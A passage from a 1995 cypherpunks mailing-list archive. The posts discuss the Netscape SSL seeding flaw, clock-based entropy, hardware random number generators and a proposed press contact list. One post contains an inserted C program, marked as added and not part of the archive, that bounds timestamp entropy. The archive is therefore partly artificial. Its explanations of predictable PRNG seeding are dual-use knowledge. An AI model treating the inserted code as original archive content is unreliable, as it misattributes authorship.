to find third party opinions about network security and other cryptography
issues, but just don't know who to talk to about them.  By making it easy
for them to find us, we'd be more likely to be consulted for opinions.

I'd be willing to serve as a contact for my area (Southeastern Virginia) if
anyone wants to start putting together such a list.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Tue, 19 Sep 95 19:16:43 PDT
To: starrd@iia2.org (starrd)
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <Pine.BSD.3.91.950913234317.9083H-100000@usr3.primenet.com>
Message-ID: <199509200214.MAA08618@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks,

starrd wrote:
> On Wed, 13 Sep 1995, Jiri Baum wrote:
> > 
> > I feel I should point out that you have no proof that the text you have
> > attributed to me was in fact posted by me, and in fact you have reason
...

> Wasn't a flame my friend.....wasn't meant as one either.

It wasn't taken as one... I quite agree with your description of the text
in question as "drivil" (though I wouldn't have spelled it quite that way).
We probably shouldn't judge without context, but I hear the context is
of the same intellectual quality anyway.

> > Off topic, but I have been publicly accused so I feel I should publicly
> > respond in the same forum.

I should have been clearer; that "accused" is not of stupidity, but of
posting a) allegedly trade secret material 
        b) allegedly copyright material allegedly in excess of fair use.

For which you have no proof and in fact have reason to believe otherwise etc.

> -----BEGIN PGP PUBLIC KEY BLOCK-----
...

By the way, starrd, why don't you sign your posts?
You obviously have PGP...


Hope this is less ambiguous than my previous post :-)

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMF95CixV6mvvBgf5AQHQmgP/fXrJhmmsnyAVmVyGSnUCOBVSS6sjXSua
F53GFgRS28ICxnQ2d+ooEfbtgsxuzhk1qjphW2MXROAi8QI/GQDWtNeMer0/38yg
ImyXqoysa4mKUgw0v+38QbgXIFeteIY9qyvJbe3O9WGg8gVRnRsWkxIB7QuAPkkC
jVn2ho0gYOw=
=SDDV
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 09:23:33 PDT
To: fair@clock.org
Subject: Re: Please send me SSL problems...
Message-ID: <9509201622.AA19050@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs ...
>  The IETF quite explicitly doesn't care about APIs

With one exception so important that it might blow away your whole
complaint...

...GSSAPI.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Wed, 20 Sep 95 10:30:18 PDT
To: sommerfeld@orchard.medford.ma.us
Subject: Re: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <m0svSs1-00071JC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks you write:

>A couple comments on using the time as a seed:

>Any system running NTP will let you know its clock to within a couple
>ms; some folks have gotten NTP accuracy down to the high hundred
>microseconds on real-time systems..

Yeah, and even if it's not running ntp full time (just doing the ntpdate
hack in cron), with any justice it's still within a second of real 
honest-to-goodness WWV-and-friends time.  

>Any entropy you get from sampling the system clock will have to come
>from the low-order bits of the tv_usec, or equivalent, and you'll only
>get a few bits per sample.

Maybe not even that; does anybody know which of the popular machines 
actually have microsecond timers, so that gettimeofday() actually returns
continuously updated microsecond values in between clock ticks?  If you 
don't have that, your entropy in those low order bits is definitely gonna
be pretty slim, since you're basically measuring the entropy in the "drift"
values ntpd is applying, which don't change very quickly.  I know BSDI 
actually uses one of the peecee timer registers to implement a microsecond
timer, so you actually get decent time resolution; dunno if the other 
peecee *BSD releases do the same.
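
[Added example, not part of the post above or of the archive: a C probe for the question it raises, namely whether gettimeofday() advances between clock ticks, and how few bits a timestamp then adds to a seed once an observer knows the clock to within +/-1 ms (ntpd) or +/-1 s (ntpdate from cron). The 100 Hz tick, the 1..13 us loop times and the start time are constructed assumptions; the figures are a ceiling on timestamp entropy, not a measurement of it.]

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/time.h>

#define NREAD 4096

/* Smallest nonzero step between consecutive readings, in microseconds.
 * The clock's real granularity is no coarser than this; 0 means the
 * clock never advanced during the run. */
uint64_t timer_granularity_us(const uint64_t *t_us, size_t n)
{
    uint64_t best = 0;
    for (size_t i = 1; i < n; i++) {
        if (t_us[i] <= t_us[i - 1])
            continue;                 /* repeated or stepped-back reading */
        uint64_t d = t_us[i] - t_us[i - 1];
        if (best == 0 || d < best)
            best = d;
    }
    return best;
}

/* ceil(log2(x)) for x >= 1: bits needed to index x candidates. */
unsigned bits_needed(uint64_t x)
{
    unsigned bits = 0;
    while (bits < 63 && (1ULL << bits) < x)
        bits++;
    return bits;
}

/* Ceiling on the bits one timestamp adds to a seed when the observer
 * knows the time to within +/- window_us: a clock stepping in units of
 * granularity_us returns at most ceil(2w/g) + 1 distinct values there. */
unsigned timestamp_seed_bits(uint64_t granularity_us, uint64_t window_us)
{
    if (granularity_us == 0)
        return 0;
    uint64_t span = 2 * window_us;
    return bits_needed((span + granularity_us - 1) / granularity_us + 1);
}

/* Constructed data (not a measurement): n readings taken 1..13 us apart
 * from a clock that only advances on tick_us boundaries. tick_us = 1
 * models a free-running microsecond counter, 10000 a 100 Hz tick clock. */
void simulate_readings(uint64_t *out, size_t n, uint64_t tick_us)
{
    uint64_t real = 811613403456ULL;  /* arbitrary constructed start, us */
    for (size_t i = 0; i < n; i++) {
        out[i] = real - real % tick_us;
        real += 1 + (i * 7) % 13;     /* loop time varies between calls */
    }
}

uint64_t simulated_granularity_us(uint64_t tick_us)
{
    static uint64_t buf[NREAD];
    simulate_readings(buf, NREAD, tick_us);
    return timer_granularity_us(buf, NREAD);
}

/* Live probe: read this machine's gettimeofday() in a tight loop. */
uint64_t probe_gettimeofday_us(void)
{
    static uint64_t buf[NREAD];
    struct timeval tv;
    for (size_t i = 0; i < NREAD; i++) {
        gettimeofday(&tv, NULL);
        buf[i] = (uint64_t)tv.tv_sec * 1000000ULL + (uint64_t)tv.tv_usec;
    }
    return timer_granularity_us(buf, NREAD);
}

int main(void)
{
    /* How well an observer knows the clock: ntpd, then ntpdate from cron. */
    const uint64_t window_us[] = { 1000, 1000000 };
    const char *name[] = { "100 Hz tick clock (constructed)",
                           "microsecond counter (constructed)",
                           "this machine's gettimeofday()" };
    uint64_t gran[3];
    gran[0] = simulated_granularity_us(10000);
    gran[1] = simulated_granularity_us(1);
    gran[2] = probe_gettimeofday_us();

    for (int c = 0; c < 3; c++) {
        printf("%-34s smallest step %llu us\n", name[c],
               (unsigned long long)gran[c]);
        for (int w = 0; w < 2; w++)
            printf("    clock known to +/-%llu us: <= %u bits per timestamp\n",
                   (unsigned long long)window_us[w],
                   timestamp_seed_bits(gran[c], window_us[w]));
    }
    return 0;
}
```

[The same ceiling applies to any sampler that reads this clock, keystroke-timing samplers included: a sample cannot carry more bits than the clock's step allows.]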





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Sep 95 12:31:48 PDT
To: cypherpunks@toad.com
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
Message-ID: <199509201928.MAA20230@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm going to argue against TCM and others who are opposed to a 
"cypherpunk press release" because this is not an "organized group".

a press release mechanism is one way by which the organization of this
group can be increased. and I'm going to say something heretical 
in cypherpunk circles, but imho, ORGANIZATION == POWER. this is
a basic rule of life that all the rabid libertarians and cryptoanarchist
loners here hate to admit, but it's really true and inescapable.

anyone who wants to issue press releases for the "cypherpunks", I say,
GO FOR IT. don't let someone discourage this because this is an
"anarchy". that's actually an excellent reason for you to JUST DO IT!!
some will be willing to have their names on the list, and they will
email you. others will flame you and not want their name included. simply
ignore the latter category!!

the cypherpunk logo is not copyrighted. no one has any say on who or what
a "cypherpunk" is. so, let someone pick a reality and let it prosper
or wilt by assent and "voting with the feet".

just be careful not to misrepresent anyone. start a list, just like anyone can
start a FAQ. a list of names to contact and their specialties would be
*excellent* for this purpose. occasional press reports on what is happening
on list traffic would be very useful, too.

look, there are some very tangible and definite ways to advance the
cypherpunk agenda. there are many here who like to play in the dark
and shadows and not make any noise. that's fine!! but don't expect everyone
to share your disinterest in publicity or organization. if this is in
fact an anarchy, why are you discouraging anyone from pursuing that which
interests them??

IMHO playing in the dark, not trying to appeal to the widespread masses
through the media and everything else at hand, is just the NSA's way
of trying to manipulate reality through "back door" approaches.

I again suggest that a simple list of people here who are willing to
talk to the press, organized under their expertise/speciality, is an
*excellent* idea that is an idea whose time has come. 

this is such a great idea that *I* may do it if nobody does it after
a week or two.


--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 09:32:31 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509201631.AA19151@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> You could do that, but that's not how C does things. C allocates these
> things on the stack.

Nope.  Just because almost all machines anyone is ever going to use
in their lifetimes are stack-based doesn't mean C is stack-based.

The C compiler I once used on a LispMachine had no stack.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Sep 95 12:33:26 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape sub rosa?
Message-ID: <199509201933.MAA19342@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 9/20/95 -0700, you wrote:
>
>Gee, where's that "Cypherpunks logo" when you really need it?
>
>A rose covering the Netscape "N" logo? A crypto eagle swooping down and
>pecking at weak keys?
>
>Netscape sub rosa?

Or a big burning Netscape logo?  Or an NSA agent licking the hot end of an
electrical power cord for a Cray?  Or a picture of a lock with a big bullet
hole through it?

Oh no!  Not the "Logo Wars(tm)" again!

|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 09:34:15 PDT
To: cypherpunks@toad.com
Subject: Why couldn't it have been 42?
Message-ID: <9509201633.AA19179@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


[drand48 is supposed to return a random number]

From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
To: cypherpunks@toad.com
Date: Wed, 20 Sep 1995 10:38:58 -0500

Kun Luo, one of our grad students here recently found a bug in Sun's
implementation of the drand48() function.  We reported it to Sun, and they
acknowledged the bug exists - it seemed to be the first time they had
heard of it, though.  The bug affects Sun's ANSI C compiler shipped with
SPARCWorks3.0 and consists of the following:  If you're compiling using
the -Xc flag (strict ANSI C, no SUN C compatibility extensions), the
function drand48() is BROKEN.  It ALWAYS returns the number 9.000000 ...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Date: Wed, 20 Sep 95 03:35:43 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509201034.AA10521@PrakInf.TU-Ilmenau.DE>
MIME-Version: 1.0
Content-Type: text/plain


Is it a good idea to use different (unrelated!) seeded PRNG's for the
challenge data (which can be seen by sniffing) and the masterkey (which
should never leave out of client's memory)?

read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 09:39:46 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <9509201631.AA19151@sulphur.osf.org>
Message-ID: <199509201639.MAA05261@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> > You could do that, but that's not how C does things. C allocates these
> > things on the stack.
> 
> Nope.  Just because almost all machines anyone is ever going to use
> in their lifetimes are stack-based doesn't mean C is stack-based.

Effectively the same thing for our purposes, neh?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 20 Sep 95 09:48:21 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FROM A FRIEND . . .
Message-ID: <199509201648.MAA14624@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Updating Customers:
>Netscape will provide the fix for Export (40 bit) versions of Netscape
>Navigator later this week for downloading by customers on the Internet.
>Similarly, the
>Commerce Server patch for Export versions (40 bit) will be made available
>from our home page. Because downloading of 128 bit versions of the software
>is still not permitted by U.S. law, U.S. customers of Netscape Navigator,
>Netscape Navigator Personal Edition and Netscape Commerce Server using 128
>bit versions can request the replacement from Netscape for delivery through
>the regular mail.

Funny, MIT and MPJ and others manage to enable the downloading of
export-controlled software.  Also, wasn't there some sort of promise by
Netscape after we broke the 40-bit version to make the 128-bit version
available to US users under the Beta/freeware system?  What happened to that
plan?

DCF

"This encryption thing is a lot harder than it looks."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Sep 95 13:08:42 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509202008.NAA29083@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:18 PM 9/20/95 +0200, you wrote:

>> Browser in the US, text in US, crypto gif imported from UK, both legal.
>> 
>> Browser outside US, text in US, crypto gif imported from UK, both legal.
>> 
>> See a flaw in that?
>
>Not directly, but... what if for some strange reason the image is routed
>through US gateways on its way from the UK to, for example, Germany?
>I mean, The Net (tm) is a strange beast, and you can rarely tell which way
>the message flows... you can't even DO anything about it.

It can get pretty weird.  A friend did a traceroute on a site across town.
It was relayed half-way across the world to get there.  (Through Poland or
some such absurdity.)  

It seems that no matter what you do, you are breaking the law...
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 10:15:55 PDT
To: fair@clock.org
Subject: Re: Please send me SSL problems...
Message-ID: <9509201715.AA19393@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From what I can see, GSSAPI has broad acceptance and will soon have broad
use.

I've heard that Digital, HP, and IBM have all mandated that all security
code (except keymgmt and other things that are out of scope) must go
through the GSSAPI:  no writing your own stuff.  I heard, less
authoritatively, that Microsoft has the same rules, except they use a
FunnyLookingVariant(far) of an earlier GSSAPI draft.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Wed, 20 Sep 95 11:16:30 PDT
To: goedel@tezcat.com (Dietrich J. Kappe)
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <30605a7539c7002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that Dietrich J. Kappe said:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
> 

I think that a press release would be hard, based on the fact that there
is no central organization here on the cypherpunks list. I know that in
times past, Eric Hughes has been quoted in the press, as well as Tim, and
perhaps others (forgive my lack of memory), but there is no approved 
spokesperson because there is no organization. 

> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.

Does anyone know exactly how the press contact thing works? My impression
is that a reporter/journalist stumbles on to someone who knows something 
about a particular area, and is willing to be interviewed. Then the next
time a story comes along that deals even slightly with that subject, the
reporter will tend to contact that person. 

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Sep 95 10:21:40 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <43o23b$91r@calum.csclub.uwaterloo.ca>
Message-ID: <9509201721.AA07110@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Clavadetscher of PrivaSoft writes:
> At this time our crypto engine is patented and proprietary. 

Ian Goldberg writes:
> Waitasec...  I was under the impression that if you patented it, you had to
> reveal it.  That's why RC4 isn't patented (it used to be a trade secret).

I think I have figured out now what Clavadetscher meant. According to the
PrivaSoft home page, the product uses "bitmap encryption". Inspired by your
mention of patents being published, I sought a relevant patent, and I believe
I've found it. U.S. Patent 5,321,749 was issued to a Richard Virga of Danbury,
CT in 1994. It describes a protocol for representing an arbitrary fax
document as a bitmap, encrypting it, and encoding it for transmission. 

The user inputs a password (4-20 characters) to be used as a session key. 
However, no encryption algorithm is specified. (The patent suggests the 
familiar method of seeding a PRNG with the session key, and XORing the 
resulting stream with the plaintext bitmap.)

Assuming this is in fact the scheme PrivaSoft uses, I posit that their
"crypto engine" consists of a patented (by someone who now works for them ?)
protocol wrapped around a proprietary encryption algorithm.

20 characters (the patent doesn't discuss constraints on the character set,
AFAIK) looks rather short. This is one possible reason for the Commerce 
Dept.'s export approval.

http://www.megasoft.com/privasoft/about.html discusses PrivaSoft.
ftp://town.hall.org/patent/data/05321/05321749 is the text of Patent 5,321,749.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Tue, 19 Sep 95 21:07:29 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Unabomber - crypto-anarchist?!?
Message-ID: <9509200407.AA07481@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Found this quote from the Electronic Telegraph, the online version of
a UK daily newspaper. (world news section, Weds 20th Sept)
http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html

"Editors forced to print manifesto of Unabomber

By Charles Laurence in New York

...The heart of his argument is that industrial society has led to ways of 
life for which people are fundamentally unsuited. He calls for a 
crypto-anarchic revolution and a new order based on small, village-style units."
^^^^^^^^^^^^^^^

Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-)

Sherry

ps You are supposed to register to read the ET but I registered as "cypherpunks"
passwd "cypherpunks" - don't worry I didn't give the mailing list address.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 20 Sep 95 11:12:55 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Hold a Cracking Party
Message-ID: <199509201812.OAA28709@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 AM 9/19/95 -0400, Duncan Frissell wrote:
>Just to let everyone know that I've got an assignment from Wired to do a
>story with the above working title.
>

As it turns out, Steven Levy and I had an assignment collision at Wired and
were both assigned the story.  For some unknown reason, they wanted him to
do it instead of me so I will *not* be doing it.  

Steve -- feel free to use my title if you like.

DCF

"Anyone know any publications interested in an article on the Crack?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 14:26:10 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509202120.OAA28581@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>     weeks ago. The time spent on patching the current release will not
>     all go to waste, but it has cut down on my limited opportunities to
>     sleep.
> 
> For those that are curious: being responsible for helping to fix a bug that
> is getting front page coverage in major newspapers is not nearly as
> much fun as it sounds.
> 

	This looks really good. I only wish your PR people wouldn't
spout the garbage that they do.

	In terms of your amounts of sleep-- If netscape had waited a
month before releasing the patch it would not have been doing any
worse than most OS vendors. Netscape is to be congratulated on the
quick response.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 20 Sep 95 13:42:25 PDT
To: cypherpunks@toad.com
Subject: MacRandoms
Message-ID: <199509202042.OAA16124@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




I've uploaded the cryptographic random number code for the Mac to 

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

This file contains Colin Plumb's randpool code, my Macintosh wrapper for
it, and a nice 68K assembler implementation of MD5. Enjoy.

(Sorry if this has gotten posted twice, but my original post seems to have
disappeared.)

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xavier Naveira <A00467@servicom.es>
Date: Sat, 23 Sep 95 18:33:57 PDT
To: All@hudson.lm.com
Subject: Hello
Message-ID: <43p9kj$7fh@sparky.servicom.es>
MIME-Version: 1.0
Content-Type: text/plain


Hello!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 14:50:21 PDT
To: cypherpunks@toad.com, gnu
Subject: Project: a standard cell random number generator
Message-ID: <9509202150.AA08164@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Software-generated random numbers are likely to be of poor quality.
There just isn't that much true randomness visible to computers.
Several ways to build good hardware random number generators are
known.  But before hardware random number generators can be
incorporated into common desktop computers, someone will have to put
them into a small fraction of a chip.

Currently, random number generators are chips or larger circuits.
Nobody will pay to put these on a motherboard.  But if a random number
generating circuit occupied 1/1000th of a CPU chip or "multi-function
I/O" chip, cost would not be a reason to leave it out.

You probably can't build a hardware random number generator out of
existing "gate array" gates or "standard cell" cells, because all the
existing gates and cells are designed to behave completely
predictably!  It will take designing a new circuit structure.

Do we know any solid state physics / circuit design experts who think
this might be a fun thing to do?  I bet you could get a paper out of
it.  And probably improve the world a few years later, when companies
used your paper to close another hole in their computer security.

	John

PS: It's possible that NSA collusion with chip-makers could produce
bad pseudo-random-number generators in popular chips, giving NSA a
back-door into any algorithm that used them.  This would be harder to
detect than poor software random number generators, since it requires
prying the lid off the chip, getting out your microscope, and
reverse-engineering the circuit, instead of just disassembling the
software.  In this sense, NSA ought to be *encouraging* Intel and
IBM and Motorola to put "generate random bits" instructions into
their instruction sets...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 12:57:37 PDT
To: cypherpunks@toad.com
Subject: A message from Joe Six-Pack
Message-ID: <9509201957.AA10522@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Well, the original sender of this is actually anything but "Joe
Six-Pack"; his taste in beer is well-developed, and he's no moron.
This is, however, an interesting take on the Netscape thing from a
non-cypherpunk.  He came across the Community ConneXion press release
and responded:

------- start of forwarded message (RFC 934 encapsulation) -------
From: XXXXX
Subject: Re: Fwd: HackNetscape promotion (fwd)

>For Immediate Release 
>Contact: sameer@c2.org 510-601-9777 
> 
>COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS 
> 
>Sept 19 1995 - Community ConneXion ...

Am I the only one who finds this silly?

All this fuss about credit card encryption is such BS.  My totally
unencrypted credit card number is in the hands of brain-dead minimum-wage
waitrons and green-haired retail clerks dozens of times a week with no
encryption.  Gas station attendants, restaurant clerks, supermarkets and
banks have the number, and an unscrupulous type could use it and hose me at
any time.  I've had credit cards for 15 years and nothing like that has ever
happened.  If it does, I'm out $50 and a bunch of pain in the butt phone calls.

So the thought of some geek with a LAN sniffer and too much time on his
hands sucking simply encrypted numbers off the internet does not exactly
make my heart go pitter-pat.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 20 Sep 95 12:00:43 PDT
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <Pine.ULT.3.91.950920145548.2466B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Dietrich J. Kappe wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
> 
> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.
> 
> 
> 

I've got a pretty effective list of fax numbers...everything from the Fox
network to CBS' Eye on America show.   Anyone can contact me if you need 
'em.. I'm sure we could put them to good use.

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 15:05:31 PDT
To: cypherpunks@toad.com
Subject: netscpe will release code?
Message-ID: <199509202200.PAA03146@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I just spoke with a reporter from the sfchronicle who told me
that when she talked to Netscape they said that they would be
releasing parts of their source code to the net.
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 20 Sep 95 15:15:34 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <199509202215.PAA14101@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20, 12:29am, Christian Wettergren wrote:
>> Subject: Re: netscape's response
>> One wild idea that I just got was to have servers and clients exchange
>> random numbers (not seeds of course), in a kind of chaining way. Since
>> most viewers connect to a number of servers, and all servers are
>> connected to by many clients, they would mix "randomness sources" with
>> each other, making it impossible to observe the local environment
>> only. And the random values would of course be encrypted under the
>> session key, making it impossible to "watch the wire".

Be _very_ careful with this approach - it's the kind of thing that a
rogue server or client might abuse to find out randomness or other state
information about the clients or servers connecting to it.
At minimum, only give out some of your randomness, XORed with some
arbitrary value to scramble the range and then hashed before sending,
so that the recipient can't find out the values you're using.

One valuable technique is to continually accumulate any randomness available,
rather than just going for what's available right when you need it.
However, one source of right-when-you-need-it randomness to contribute
to session keys is hashing the plaintext, or at least the first chunk of it;
if you use this carefully (e.g. by throwing it in with the rest of your
hash input), it should provide input unavailable to the attacker.

Also, while network boards and sound cards can provide useful randomness,
you can't depend on their existence, at least in the PC world; most home users
probably connect over modems and don't have LANs.  So any software that
would like to use these needs to include methods of detecting their existence
before trying to get data from them.  (Suns obviously all have network
interfaces, and Sparcstations have /dev/audio, but not all Unix boxes are
similarly equipped.)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Evans <devans@hclb.demon.co.uk>
Date: Wed, 20 Sep 95 10:32:17 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
